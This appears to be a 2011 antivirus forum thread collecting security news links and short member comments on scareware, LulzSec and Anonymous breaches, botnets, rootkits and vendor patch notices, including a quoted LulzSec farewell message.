Allied Telesis – no backdoor in devices
http://www.h-online.com/security/news/item/Allied-Telesis-no-backdoor-in-devices-1257052.html
-
Fake anti-viruses for MAC, new 64-bit rootkits, and other "surprises" of May
http://news.drweb.com/show/?i=1706&lng=en&c=9
-
Pretty sure this is a false Positive. wish I could remember what piece of malware avast said it was trying to download on the system.
failblog.org
-
Microsoft Security Bulletin Advance Notification for June 2011
https://www.microsoft.com/technet/security/bulletin/ms11-jun.mspx
-
Prenotification: Quarterly Security Updates for Adobe Reader and Acrobat
http://blogs.adobe.com/psirt/2011/06/prenotification-quarterly-security-updates-for-adobe-reader-and-acrobat-3.html
-
http://nakedsecurity.sophos.com/2011/06/09/fake-anti-virus-cloaks-itself-to-appear-to-be-microsoft-update/
Fake anti-virus cloaks itself to appear to be Microsoft Update
We are seeing the criminals behind fake anti-virus continuing to customize their social engineering attacks to be more believable to users and presumably more successful.
Last week I wrote about fake Firefox malware warnings leading users to rogue security software. This week they've started to imitate Microsoft Update.......... (more)
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
-
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
However, you where using Firefox when it came up and windows update only works in IE.
-
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
However, you where using Firefox when it came up and windows update only works in IE.
Good point Bob and also, you only see that page in XP. In Vista and I'm assuming 7 as well, you never actually go to the MS Update site so that would be a red flag for many as well.
-
Patch Tuesday heads-up: Critical holes in Windows, IE, MS Office
http://www.zdnet.com/blog/security/patch-tuesday-heads-up-critical-holes-in-windows-ie-ms-office/8739?tag=nl.e589 (http://www.zdnet.com/blog/security/patch-tuesday-heads-up-critical-holes-in-windows-ie-ms-office/8739?tag=nl.e589)
Critical Vulnerabilities in IE9 and Windows 7 SP1 to Be Patched Next Week
http://news.softpedia.com/news/Critical-Vulnerabilities-in-IE9-and-Windows-7-SP1-to-Be-Patched-Next-Week-205440.shtml (http://news.softpedia.com/news/Critical-Vulnerabilities-in-IE9-and-Windows-7-SP1-to-Be-Patched-Next-Week-205440.shtml)
-
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
However, you where using Firefox when it came up and windows update only works in IE.
No, I was not using Firefox nor was the owner of the laptop. I loathe Firefox and avoid it where ever possible. The laptops owner was using Safari at the time.
The point is there are millions of people that do not understand their systems that well and they ARE fooled by these things, if every user was 100% tech savvy there would be no need for any AV systems at all.
-
The point is there are millions of people that do not understand their systems that well and they ARE fooled by these things, if every user was 100% tech savvy there would be no need for any AV systems at all.
I highly doubt that being tech savvy would end your need for your security related software.
I do agree that this malware is very convincing and will fool the average computer user which
is why keeping your software totally up to date becomes more critical all the time.
Since the new Malware always comes first, there is also no assurance of !00% protection and those with
some tech knowledge have a better chance of staying safe than those that have none.
-
The point is there are millions of people that do not understand their systems that well and they ARE fooled by these things, if every user was 100% tech savvy there would be no need for any AV systems at all.
I highly doubt that being tech savvy would end your need for your security related software.
+1
-
1234 is the most common iPhone passcode, app developer reveals (http://thenextweb.com/apple/2011/06/13/1234-is-the-most-common-iphone-passcode-app-developer-reveals/?utm_source=twitterfeed&utm_medium=feed&utm_campaign=Feed%3A+TheNextWeb+%28The+Next+Web+All+Stories%29)
-
1234 is the most common iPhone passcode, app developer reveals (http://thenextweb.com/apple/2011/06/13/1234-is-the-most-common-iphone-passcode-app-developer-reveals/?utm_source=twitterfeed&utm_medium=feed&utm_campaign=Feed%3A+TheNextWeb+%28The+Next+Web+All+Stories%29)
LOL, duh. /off-topic. ;D
-
Fake Firefox warnings lead to scareware
http://nakedsecurity.sophos.com/2011/05/30/fake-firefox-warnings-lead-to-scareware/ (http://nakedsecurity.sophos.com/2011/05/30/fake-firefox-warnings-lead-to-scareware/)
-
In all honesty, this isn't new, just another variant of the same theme, social engineering.
All the warnings in the world on stuff like this won't prevent the unwary or those not knowledgeable about their own system will be caught time and again. All things have to be taken with a degree of suspicion and a large dose of common sense.
How can something know your system is infected or is running a scan if you didn't actually download it and give it permission to run, simple it can't and common sense should tell you that. After dashing round the room like a headless chicken for a while, don't click anything and I do mean anything, use task manager to end all browser processes.
Now clear your temp files with something like ccleaner - then you can start to thing about precautionary scans avast, mbam, etc.
Unfortunately, those people reading these security warnings, etc. are the least likely to have been tricked in the first place.
-
IMF attack "a very major breach"
http://www.h-online.com/security/news/item/IMF-attack-a-very-major-breach-1259469.html
http://www.bloomberg.com/news/2011-06-11/imf-computer-system-infiltrated-by-hackers-said-to-work-for-foreign-state.html
http://www.reuters.com/article/2011/06/13/us-imf-cyberattack-idUSTRE75A20720110613?feedType=RSS&feedName=topNews
-
Games companies under attack
http://www.h-online.com/security/news/item/Games-companies-under-attack-1259475.html
http://community.codemasters.com/forum/news-announcements-1300/announcements.html
http://forums.epicgames.com/showthread.php?t=799379
-
Hackers breached Citibank security using simple URL manipulation
http://www.h-online.com/security/news/item/Hackers-breached-Citibank-security-using-simple-URL-manipulation-Update-1260964.html
http://www.reuters.com/article/2011/06/16/us-citigroup-idUSTRE75F0RU20110616
-
LulzSec takes down the CIA web site
http://www.h-online.com/security/news/item/LulzSec-takes-down-the-CIA-web-site-1261838.html
-
I read the article but when I clicked on the highlighted link for Lulzsec.com, I got a blue screen that went too fast to read and the machine rebooted. No problems so far and scans have found nothing but I don't know how to see what caused the BsoD.
I'll try to attach the minidump file if any cares to help me find the cause.
BTW, those LulzSec people all need to be arrested.
-
unreadable ... in worst case You already zombie :)
-
Meh, my main home machine did just fine when I clicked the link. Dunno what happened to yours.
-
FF4 - WebGL graphics memory stealing issue
http://blog.mozilla.com/security/2011/06/16/webgl-graphics-memory-stealing-issue/
-
I disabled WebGL in FF4 some time ago using the about:config settings when the 'first' warning about WebGL came out, see image.
I suggest those of you who haven't already done this, do so as an interim measure until it is resolved. Interestingly NoScript also has that option, but by default it is enabled, so it could be disabled there if you are using NoScript in FF4.
-
unreadable ... in worst case You already zombie :)
No, I'm fine but to analyze the dump file you need a bunch of developer utilities that I just don't want to mess with. I thought maybe somebody had the capability and the time to analyze it for me. Just now I bravely clicked the link again and didn't have a problem. Probably just a glitch.
-
FF4 - WebGL graphics memory stealing issue
http://blog.mozilla.com/security/2011/06/16/webgl-graphics-memory-stealing-issue/
Hooray for the combination of Chrome and XP. WebGL is disabled by default. ;D
-
Trojan targets Bitcoin wallets
http://www.h-online.com/security/news/item/Trojan-targets-Bitcoin-wallets-1262715.html
-
Virgin alerts infected customers
http://www.bbc.co.uk/news/technology-13798122
-
Stuxnet: Computer Virus and Weapon...... a scarey wideo
http://my.opera.com/portalnews/blog/2011/06/19/stuxnet-computer-virus-and-weapon
-
Dropbox security glitch meant any password worked yesterday
http://www.geek.com/articles/news/dropbox-security-glitch-meant-any-password-worked-yesterday-20110620/
thread on DropBox forums, no official comment yet:
http://forums.dropbox.com/topic.php?id=40113&replies=11#post-328320
... I first thought the guy (the OP) was a troll... well he's not... issue seems to be confirmed by others. See here too:
http://news.ycombinator.com/item?id=2674570
-
Thanks Logos. Seems a very weird behavior of Dropbox... I do not use it anymore but for an online backup, they should give security more attention...
-
Just been reading another old article about dropbox and privacy/security in one of my newsletters, Windows Secrets. I didn't pay it a lot of attention at the time as I don't use dropbox, but perhaps now it is even more relevant.
On-line article http://windowssecrets.com/top-story/re-examining-dropbox-and-its-alternatives/#story1 (http://windowssecrets.com/top-story/re-examining-dropbox-and-its-alternatives/#story1).
-
dropbox incident now officially confirmed: it lasted about 4 hours.
http://blog.dropbox.com/?p=821
-
dropbox incident now officially confirmed: it lasted about 4 hours.
http://blog.dropbox.com/?p=821
Good answer. Acknowledged, learned, improved.
-
Continuing the Fail so Epic, it will rattle the bones of thy ancestors, Sony gets hacked again.
http://news.cnet.com/8301-31021_3-20072668-260/hackers-claim-177k-e-mails-from-sony-pictures-france/ (http://news.cnet.com/8301-31021_3-20072668-260/hackers-claim-177k-e-mails-from-sony-pictures-france/)
wondering how well some "I Pwnd Sony" T-shirts would sell if I printed them up, since this is obviously fashionable now :P
-
And in other news, a 2 headed monster formed with the intention of tearing things down with no idea what to replace them with. ::)
http://news.cnet.com/8301-27080_3-20072675-245/lulzsec-anonymous-announce-hacking-campaign/ (http://news.cnet.com/8301-27080_3-20072675-245/lulzsec-anonymous-announce-hacking-campaign/)
Its formidable powers include Email theft, leaking private docs, DDoS, cannon fire w/ lizard blood, Lazors, and a skin hardened by 7 proxies.
This monster would be called by some name (Lulnonymous?), but one of its heads (the one that looks like a faceless suit) refuses all attempts at being named.
ok, done having fun now....
-
Attack on Israeli Certificate Authority
http://www.h-online.com/security/news/item/Attack-on-Israeli-Certificate-Authority-1264008.html
-
Operation Anti-Security
LulzSec and Anonymous did ally
https://twitter.com/LulzSec/status/82667686647177216
http://pastebin.com/9KyA0E5v
[Edit] More info: http://www.h-online.com/security/news/item/Hacker-organisations-join-forces-1264337.html
-
Continuing the Fail so Epic, it will rattle the bones of thy ancestors, Sony gets hacked again.
http://news.cnet.com/8301-31021_3-20072668-260/hackers-claim-177k-e-mails-from-sony-pictures-france/ (http://news.cnet.com/8301-31021_3-20072668-260/hackers-claim-177k-e-mails-from-sony-pictures-france/)
wondering how well some "I Pwnd Sony" T-shirts would sell if I printed them up, since this is obviously fashionable now :P
OT: Actually, that's a really good idea! Better get on it before t-shirt hell or busted tees does! ;D
-
Suspected LulzSec leader arrested
http://www.zdnet.com/blog/btl/lulzsec-is-it-too-cocky-for-its-own-good/51078?tag=nl.e589 (http://www.zdnet.com/blog/btl/lulzsec-is-it-too-cocky-for-its-own-good/51078?tag=nl.e589)
-
Suspected LulzSec leader arrested
Hmmm...???
https://twitter.com/anonymouSabu/status/83159348712452096
-
Suspected LulzSec leader arrested
Hmmm...???
https://twitter.com/anonymouSabu/status/83159348712452096
For what that's worth. I wouldn't believe anything any of those guys said even if their tongues were notarized. ;D
-
For what that's worth. I wouldn't believe anything any of those guys said even if their tongues were notarized. ;D
You're right about that. Guess we should wait and see. ;)
Btw, a quote from your posted link:
Note that this man in custody may not be the LulzSec leader, notes ZDNet UK.
Anyway, we shouldn't fill this thread with OT stuff...
-
WordPress - Passwords Reset
https://wordpress.org/news/2011/06/passwords-reset/
-
Department of Justice Disrupts International Cyber Crime Rings Distributing Scareware
http://www.fbi.gov/news/pressrel/press-releases/department-of-justice-disrupts-international-cybercrime-rings-distributing-scareware
-
Department of Justice Disrupts International Cyber Crime Rings Distributing Scareware
http://www.fbi.gov/news/pressrel/press-releases/department-of-justice-disrupts-international-cybercrime-rings-distributing-scareware
nice :)
-
nice :)
Yep. :)
Seldom, that we can post some good news here...
-
I don't know if this is the right place to post this but I get a virus warning that I never got before when I visit two sites that enable me to listen to Philadelpia fire radio,,the virus description is,,,,,
SWF:Chainer[Heur]
C:\Users\Bill\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\10NS0UUU\ep_player[1].swf
This never happened before like I said. I asked someone who uses AVG and they don't get a warning. I'm a computer novice so I don't know whats going on but at least avast is catching it if its not a false positive,,,thanks. My avast is up to date,,using windows 7
The sites are,,,
eastcoast911.com,,the you have to click on the "live feeds" and select the fire dept,,,the other is,,http://www.radioreference.com/apps/audio/?ctid=2291,,and then you have to clcik on the feed for the Philadelphia fire,,,thanks for any help you can give.
-
I don't know if this is the right place to post this...
No, it isn't. ;)
http://forum.avast.com/index.php?board=4.0
-
OK I posted in that thread,,
-
LulzSec retires...!??
I just quote the text part of the (pastebin) message, links were removed.
Friends around the globe,
We are Lulz Security, and this is our final release, as today marks something meaningful to us. 50 days ago, we set sail with our humble ship on an uneasy and brutal ocean: the Internet. The hate machine, the love machine, the machine powered by many machines. We are all part of it, helping it grow, and helping it grow on us.
For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.
While we are responsible for everything that The Lulz Boat is, we are not tied to this identity permanently. Behind this jolly visage of rainbows and top hats, we are people. People with a preference for music, a preference for food; we have varying taste in clothes and television, we are just like you. Even Hitler and Osama Bin Laden had these unique variations and style, and isn't that interesting to know? The mediocre painter turned supervillain liked cats more than we did.
Again, behind the mask, behind the insanity and mayhem, we truly believe in the AntiSec movement. We believe in it so strongly that we brought it back, much to the dismay of those looking for more anarchic lulz. We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us. The support we've gathered for it in such a short space of time is truly overwhelming, and not to mention humbling. Please don't stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve.
So with those last thoughts, it's time to say bon voyage. Our planned 50 day cruise has expired, and we must now sail into the distance, leaving behind - we hope - inspiration, fear, denial, happiness, approval, disapproval, mockery, embarrassment, thoughtfulness, jealousy, hate, even love. If anything, we hope we had a microscopic impact on someone, somewhere. Anywhere.
Thank you for sailing with us. The breeze is fresh and the sun is setting, so now we head for the horizon.
Let it flow...
Lulz Security - our crew of six wishes you a happy 2011, and a shout-out to all of our battlefleet members and supporters across the globe
Update: Maybe related to this msg (see screenshot)..!?? ;)
Update #2: http://www.h-online.com/security/news/item/Last-LOL-for-LulzSec-as-hackers-disband-group-1268090.html
-
The only "oppressors" I saw in the whole situation were LulzSec themselves. Exposing thousands of people to security breaches they themselves caused. I don't believe for a second that they're gone. They've just gone on the lam and I hope they still get caught.
-
TDL4-TOP BOT
http://www.securelist.com/en/analysis/204792180/TDL4_Top_Bot
-
Hackers breached Citibank security using simple URL manipulation
http://www.h-online.com/security/news/item/Hackers-breached-Citibank-security-using-simple-URL-manipulation-Update-1260964.html
http://www.reuters.com/article/2011/06/16/us-citigroup-idUSTRE75F0RU20110616
Citibank customers lost $2.7 million in recent attack
http://www.h-online.com/security/news/item/Citibank-customers-lost-2-7-million-in-recent-attack-1268302.html
http://online.wsj.com/article/SB10001424052702303339904576406141349840916.html?KEYWORDS=citigroup
-
Rootkit Infection Requires Windows Reinstall, Says Microsoft
"Microsoft is telling Windows users that they'll have to reinstall the operating system if they get infected with a new rootkit that hides in the machine's boot sector."
http://www.pcworld.com/article/231255/rootkit_infection_requires_windows_reinstall_says_microsoft.html#tk.nl_dnx_h_crawl
-
Hi Marc57,
Scary or you should have this stand alone micro-tool and have used this precautionairy:
http://hdhacker.software.informer.com/ download this tool from the developer page: http://dimio.altervista.org/stats/download.php?id=6 (developer of Dimio's Tools = Dimitrios Coutsoumbas)
polonus
-
Not sure polonus, Because of this line in the story:
"According to Feng, Popureb detects write operations aimed at the MBR -- operations designed to scrub the MBR or other disk sectors containing attack code -- and then swaps out the write operation with a read operation.
Although the operation will seem to succeed, the new data is not actually written to the disk. In other words, the cleaning process will have failed."
Let's just hope our A/V catches it before it gets in.
-
Polonus! Great to see you back dude!
We missed you on the forum here!
Hope you are here to stay? :o
-
Rootkit Infection Requires Windows Reinstall, Says Microsoft
"Microsoft is telling Windows users that they'll have to reinstall the operating system if they get infected with a new rootkit that hides in the machine's boot sector."
http://www.pcworld.com/article/231255/rootkit_infection_requires_windows_reinstall_says_microsoft.html#tk.nl_dnx_h_crawl
This is actually overhyped and inflated to make a good news story - It is a basic TDL with a few bells and whistles.. There are some inaccuracies. A reformat will not replace the MBR - you need to repartition the drive to clear the old and get a new one
If your system does get infected with Trojan:Win32/Popureb.E, we advise you to fix the MBR and then use a recovery CD to restore your system to a pre-infected state (as sometimes restoring a system may not restore the MBR). To fix the MBR, we advise that you use the System Recovery Console, which supports a command called "fixmbr".
Chun Feng. In this instance a recovery CD would be the manufacturers factory reset disc which does wipe the disc clean and start afresh. And here is the disparity, if it can't be cleared why use the recovery console ? Or if that will cure it why reinstall ?
-
Thanks essexboy.
-
Human Errors Fuel Hacking as Test Shows Nothing Stops Idiocy
http://www.bloomberg.com/news/print/2011-06-27/human-errors-fuel-hacking-as-test-shows-nothing-prevents-idiocy.html
-
Never a truer statement, why do you thing they plaster "Do Not Click" buttons on videos (etc.), people just can't resist the temptation/challenge, common sense goes out the window.
-
US authorities have access to European cloud data
http://www.h-online.com/security/news/item/US-authorities-have-access-to-European-cloud-data-1270961.html
http://www.zdnet.com/blog/igeneration/microsoft-admits-patriot-act-can-access-eu-based-cloud-data/11225
-
Hi, I'm an Avast user, not regular poster here but I do read a lot of the stuff. Saw this in a free paper we get in the UK, thought it might be worth passing on :-
"At least 4.5million PCs, including 200,000 in Britain, have been hit in just three months.
They are now part of a vast botnet – a network of private computers infected with malicious software and controlled without the owners’ knowledge. It has been branded by analysts as the ‘most sophisticated threat today’.
The PCs were captured using a bug called TDL-4 – the latest version of a long-standing malware series, which targets Windows machines and hides itself in hard drives, well away from standard anti-virus programmes.
The creators could stand to make millions by ‘renting’ space on the infected network to other cyber criminals.
They pay small fees to ‘affiliate’ hackers to help spread the botnet and receive between £12 and £120 for every 1,000 installations, which are often conducted via pornographic or ‘bootleg’ sites and video and file storage services.
Kaspersky Lab security researchers claim the hackers are ‘essentially trying to create an indestructible botnet that is protected against attacks, competitors and antivirus companies’.
More than 30 per cent of all victims so far are in the US, with seven per cent in India and five per cent in Britain.
A single group is believed to be behind the botnet, which has its own anti-virus code that scans the infected machine for other malicious programmes and deletes them to see off any rival cyber attackers.
Ram Herkanaidu, from Kaspersky, added: ‘As long as the botnet master gets paid they don’t really mind. It can be used for anything really."
http://www.metro.co.uk/tech/868005-at-least-4-5million-pcs-hit-by-indestructible-tdl-4-botnet
-
Plug mouse into the computer - be compromised
http://norman.com/security_center/security_center_archive/2011/plug_mouse_into_the_computer_be_compromised/en
-
Plug mouse into the computer - be compromised
http://norman.com/security_center/security_center_archive/2011/plug_mouse_into_the_computer_be_compromised/en
Hmm...a bit more sinister than what we used to do in school...plug our mouse into someone elses computer when they weren't looking...Great fun... ;D ;D
-
Plug mouse into the computer - be compromised
http://norman.com/security_center/security_center_archive/2011/plug_mouse_into_the_computer_be_compromised/en
More here: http://forum.avast.com/index.php?topic=66267.msg660925#msg660925
-
New banking trojan named Sunspot challanges ZeuS-Spyeye
http://www.theregister.co.uk/2011/05/11/sunspot_banking_trojan/
-
Alert: vsftpd download backdoored
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
-
Computer-Hacking Group Targets Apple In Latest Attack
http://online.wsj.com/article/SB10001424052702304803104576424573989176378.html?mod=rss_Technology
-
Computer-Hacking Group Targets Apple In Latest Attack
http://online.wsj.com/article/SB10001424052702304803104576424573989176378.html?mod=rss_Technology
'bout time.
-
Anonymous: Italian police report arrests
http://www.h-online.com/security/news/item/Anonymous-Italian-police-report-arrests-1274052.html
http://ansa.it/web/notizie/rubriche/english/2011/07/05/visualizza_new.html_789705132.html
-
Microsoft Releases New Threat Data on Rustock
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
-
Washington Post jobs site breached
http://www.washingtonpost.com/wp-srv/jobs/product-pages/fraud-email.html
-
Cybercriminals switch from MBR to NTFS
http://www.securelist.com/en/blog/517/Cybercriminals_switch_from_MBR_to_NTFS
I wonder,what's next?Guess! :D
-
Microsoft Security Bulletin Advance Notification for July 2011
http://www.microsoft.com/technet/security/bulletin/ms11-jul.mspx
-
Nice one:
http://sunbeltblog.blogspot.com/2011/07/interested-in-getting-porn-and-malware.html
-
Twitter security lags some other sites: experts
http://www.reuters.com/article/2011/07/08/us-twitter-idUSTRE7667EL20110708
-
Sun Java JRE Insecure Executable Loading Vulnerability
http://secunia.com/advisories/45173/
-
Anonymous hacks another US government contractor
http://www.h-online.com/security/news/item/Anonymous-hacks-another-US-government-contractor-1277746.html
-
Top Cybercrime Mishaps of 2010 (http://www.securitynewsdaily.com/most-memorable-cybercrime-mishaps-of-2010-0363/)
-
VLC Media Player vulnerable to heap overflow exploits
http://www.h-online.com/security/news/item/VLC-Media-Player-vulnerable-to-heap-overflow-exploits-1279247.html
-
Skype - Security Advisory
http://www.noptrix.net/advisories/skype_xss.txt
-
Don't panic over latest mac malware story (http://www.securityweek.com/dont-panic-over-latest-mac-malware-story)
-
Oracle Critical Patch Update Pre-Release Announcement - July 2011
http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
-
Rogue Security Software article from microsoft (http://blogs.msdn.com/b/securitytipstalk/archive/2011/06/23/fake-security-software-know-the-risks.aspx)
-
Hotmail - Report a hacked account of a friend
http://windowsteamblog.com/windows_live/b/windowslive/archive/2011/07/14/hey-my-friend-s-account-was-hacked.aspx
-
Hotmail - Report a hacked account of a friend
http://windowsteamblog.com/windows_live/b/windowslive/archive/2011/07/14/hey-my-friend-s-account-was-hacked.aspx
Let hope this doesn't at Gmail as well :-\
-
Hotmail - Report a hacked account of a friend
http://windowsteamblog.com/windows_live/b/windowslive/archive/2011/07/14/hey-my-friend-s-account-was-hacked.aspx
Let hope this doesn't at Gmail as well :-\
Why, it happens to be an excellent addition. Lately I know of quite a few new friends (and at least one relative) who
have had their email hijacked.
I wish that ability was available in gmail. :)
-
US presents defence strategy for cyberspace
http://www.h-online.com/security/news/item/US-presents-defence-strategy-for-cyberspace-1279945.html
http://www.defense.gov/news/d20110714cyber.pdf
-
VLC Media Player vulnerable to heap overflow exploits
http://www.h-online.com/security/news/item/VLC-Media-Player-vulnerable-to-heap-overflow-exploits-1279247.html
Fixed in version 1.1.11
http://www.videolan.org/vlc/
-
Azeri Banks Corner Fake AV, Pharma Market
http://krebsonsecurity.com/2011/07/azeri-banks-corner-fake-av-pharma-market/
-
Microsoft Offers Reward for Information on Rustock
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/18/microsoft-offers-reward-for-information-on-rustock.aspx
-
Microsoft Offers Reward for Information on Rustock
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/18/microsoft-offers-reward-for-information-on-rustock.aspx
http://krebsonsecurity.com/2011/07/microsoft-offers-250k-bounty-for-rustock-author/ ;)
-
LulzSec Hacks The Times with Brutal Murdoch Death Notice
http://gizmodo.com/5822392/lulzsec-hacks-the-times-with-brutal-murdoch-death-notice
http://gizmodo.com/5822416/antisec-hackers-release-news-of-the-world-chief-rebekah-brooks-email-login
http://www.guardian.co.uk/technology/2011/jul/19/how-lulzsec-hacked-sun-website?intcmp=239
-
Google search: now with malware warnings
http://www.h-online.com/security/news/item/Google-search-now-with-malware-warnings-1282451.html
http://googleblog.blogspot.com/2011/07/using-data-to-protect-people-from.html
http://krebsonsecurity.com/2011/07/google-your-computer-appears-to-be-infected/
-
FBI arrests suspected members of Anonymous
http://www.h-online.com/security/news/item/FBI-arrests-suspected-members-of-Anonymous-1282502.html
-
Microsoft Research Team Reports Bugs in Facebook, Google Picasa
http://threatpost.com/en_us/blogs/microsoft-research-team-reports-bugs-facebook-google-picasa-071911?utm_source=Newsletter_072011&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=
Google Search Now Displaying Warning About Malware Infections
http://threatpost.com/en_us/blogs/google-search-now-displaying-warning-about-malware-infections-072011?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today%27s+Most+Popular
-
Whilst the Google warning is something to be admired, the problem being that too many it would look like some fake alert (as mentioned in the article), something which they are no doubt trying to prevent happening with the warning, etc. etc.
-
Targeted attacks on arms manufacturers continue
http://www.h-online.com/security/news/item/Targeted-attacks-on-arms-manufacturers-continue-1283425.html
-
Security Notice for CA Gateway Security and Total Defense
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7B5E404992-6B58-4C44-A29D-027D05B6285D%7D
-
Anonymous hacks NATO servers
http://www.h-online.com/security/news/item/Anonymous-hacks-NATO-servers-1284000.html
-
AnonPlus, Anonymous's social network, is hacked
http://nakedsecurity.sophos.com/2011/07/22/anonplus-anonymouss-social-network-is-hacked/
Quite funny, when the hackers get hacked... ;D
-
Security Advisories for ICQ
http://noptrix.net/advisories/icq_cli_xss.txt
http://noptrix.net/advisories/icq_web_xss.txt
-
Hackers attack South Korean sites; up to 35 mln users affected
http://www.reuters.com/article/2011/07/28/us-hackers-attack-idUSTRE76R19M20110728
-
UK Police arrest man said to be Anonymous's Topiary
http://www.h-online.com/security/news/item/UK-Police-arrest-man-said-to-be-Anonymous-s-Topiary-1286561.html
http://content.met.police.uk/News/Man-arrested-in-ecrime-investigation/1260269333921/1257246745756
-
Microsoft's Web map exposes phone, PC locations
http://news.cnet.com/8301-31921_3-20085028-281/microsofts-web-map-exposes-phone-pc-locations/
-
Skype Client - Remote Session hijacking over Facebook-Integration
http://www.secalert.net/post.php?id=36
-
Everything about "Avast enchanced protection mode"
http://xylibox.blogspot.com/2011/07/trojanfakeavlvt.html
-
Everything about "Avast enchanced protection mode"
http://xylibox.blogspot.com/2011/07/trojanfakeavlvt.html
Very good article.
-
Everything about "Avast enchanced protection mode"
http://xylibox.blogspot.com/2011/07/trojanfakeavlvt.html
Very good article.
Also, http://www.malwarecity.com/blog/trojanfakeavlvt-plays-you-like-in-movies-1114.html
-
Facebook to pay for security hole reports
http://www.h-online.com/security/news/item/Facebook-to-pay-for-security-hole-reports-1315738.html
-
Microsoft's Web map exposes phone, PC locations
http://news.cnet.com/8301-31921_3-20085028-281/microsofts-web-map-exposes-phone-pc-locations/
Microsoft Makes Change to Geographic Location Positioning Service
http://blogs.technet.com/b/privacyimperative/archive/2011/08/01/microsoft-makes-change-to-geographic-location-positioning-service.aspx
-
Timthumb PHP script opens hole in WordPress blogs
http://www.h-online.com/security/news/item/Timthumb-PHP-script-opens-hole-in-WordPress-blogs-1317479.html
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
-
Governments, IOC and UN hit by massive cyber attack
http://www.bbc.co.uk/news/technology-14387559 (http://www.bbc.co.uk/news/technology-14387559)
-
More about "Avast enchanced protection"
http://blog.eset.com/2011/08/03/win32delf-qcztrust-me-i%E2%80%99m-your-anti-virus
Facebook to pay for security hole reports
http://www.h-online.com/security/news/item/Facebook-to-pay-for-security-hole-reports-1315738.html
Easy money,huh? ;)
-
QuickTime 7.7 closes security holes
http://www.h-online.com/security/news/item/QuickTime-7-7-closes-security-holes-1318119.html
-
Microsoft Security Bulletin Advance Notification for August 2011
http://www.microsoft.com/technet/security/bulletin/ms11-aug.mspx
-
Diversification of attack vectors
http://www.norman.com/security_center/security_center_archive/2011/diversification_of_attack_vectors/en-us
During the Black Hat security conference in Las Vegas, USA, the security researcher Charlie Miller presented a method for compromising the batteries that are shipped with several of Apple's Mac computers.
Battery Firmware Hacking, Dr. Charlie Miller Black Hat USA 2011
http://www.accuvant.com/capability/accuvant-labs/security-research/featured-presentation
-
Twitter-controlled botnet mines Bitcoins
http://www.h-online.com/security/news/item/Twitter-controlled-botnet-mines-Bitcoins-1318497.html
-
Fake Firefox update email
http://nakedsecurity.sophos.com/2011/08/08/fake-firefox-update-email-malware/
-
Infected Cisco Information Packet and Warranty CDs
http://www.cisco.com/warp/public/707/cisco-sr-20110803-cd.shtml
-
Google also passes on European data to US authorities
http://www.h-online.com/security/news/item/Google-also-passes-on-European-data-to-US-authorities-1319434.html
-
Major security hole in SAP's NetWeaver
http://www.h-online.com/security/news/item/Major-security-hole-in-SAP-s-NetWeaver-1319808.html
-
***
Anonymous Hackers Expose Sensitive Law Enforcement Data
In its latest escapade, global hacker collective Anonymous claimed to release 10 GB of stolen data from more than 70 rural sheriff’s departments across the country (USA), leaking sensitive information that could compromise the agencies' investigations.
The data, which Anonymous hackers posted to Pastebin.com, was sourced to 76 law enforcement agencies’ Web sites in 11 states, including Arkansas, Kansas, Louisiana, Missouri and Mississippi. Most of the Web sites were hosted by Arkansas-based online marketing firm Brooks-Jeffrey Marketing.
http://www.crn.com/news/security/231300433/anonymous-hackers-expose-sensitive-law-enforcement-data.htm?cid=nl_sec
***
-
***
Black Hat: Hackers Can Take Control Of Diabetes Devices
Type 1 diabetics relying on radio frequency transmitting devices for monitoring and dispensing insulin might have one more thing to worry about -- the life-saving medical devices contain vulnerabilities that give potential attackers the ability to end their lives.
http://www.crn.com/news/security/231300351/black-hat-hackers-can-take-control-of-diabetes-devices.htm?cid=nl_sec
***
-
Expert says Adobe omits mention of 400 Flash Player flaws
http://www.h-online.com/security/news/item/Expert-says-Adobe-omits-mention-of-400-Flash-Player-flaws-1321881.html
-
Fake Antivirus Industry Down, But Not Out
http://krebsonsecurity.com/2011/08/fake-antivirus-industry-down-but-not-out/
Huge Decline in Fake AV Following Credit Card Processing Shakeup
http://krebsonsecurity.com/2011/08/huge-decline-in-fake-av-following-credit-card-processing-shakeup/
-
That second link is probably the most important as many of the Credit Card companies need to be more proactive in combating fraud.
-
Fake Firefox update includes trojan
http://www.favbrowser.com/fake-firefox-update-includes-trojan/
-
Anonymous take on San Francisco's rapid transit system
http://www.h-online.com/security/news/item/Anonymous-take-on-San-Francisco-s-rapid-transit-system-1323033.html
-
Anonymous take on San Francisco's rapid transit system
http://www.h-online.com/security/news/item/Anonymous-take-on-San-Francisco-s-rapid-transit-system-1323033.html
Good thing this didn't happen in Feb. when some of us where in San Francisco.
-
Not sure if this has already been posted..........as Asyn is vacuum cleaning the web for news ;D
4800 Aussie sites evaporate after hack....including backup..... D'oh! :-\
http://www.smh.com.au/technology/security/4800-aussie-sites-evaporate-after-hack-20110621-1gd1h.html
-
OpenDNS Teams With D-Link to Deliver the Easiest and Most Effective Router-Based Parental Controls Available, Protect Every Internet-Connected Device in the Household
http://www.opendns.com/about/announcements/223/
-
***
US church websites hacked to post appeal for conversion to Islam
The FBI has launched an investigation after 18 church websites across the United States were hacked and their regular content replaced with an appeal for Christians to convert to Islam.
http://www.barnabasfund.org/US-church-websites-hacked-to-post-appeal-for-conversion-to-Islam.html
***
-
***
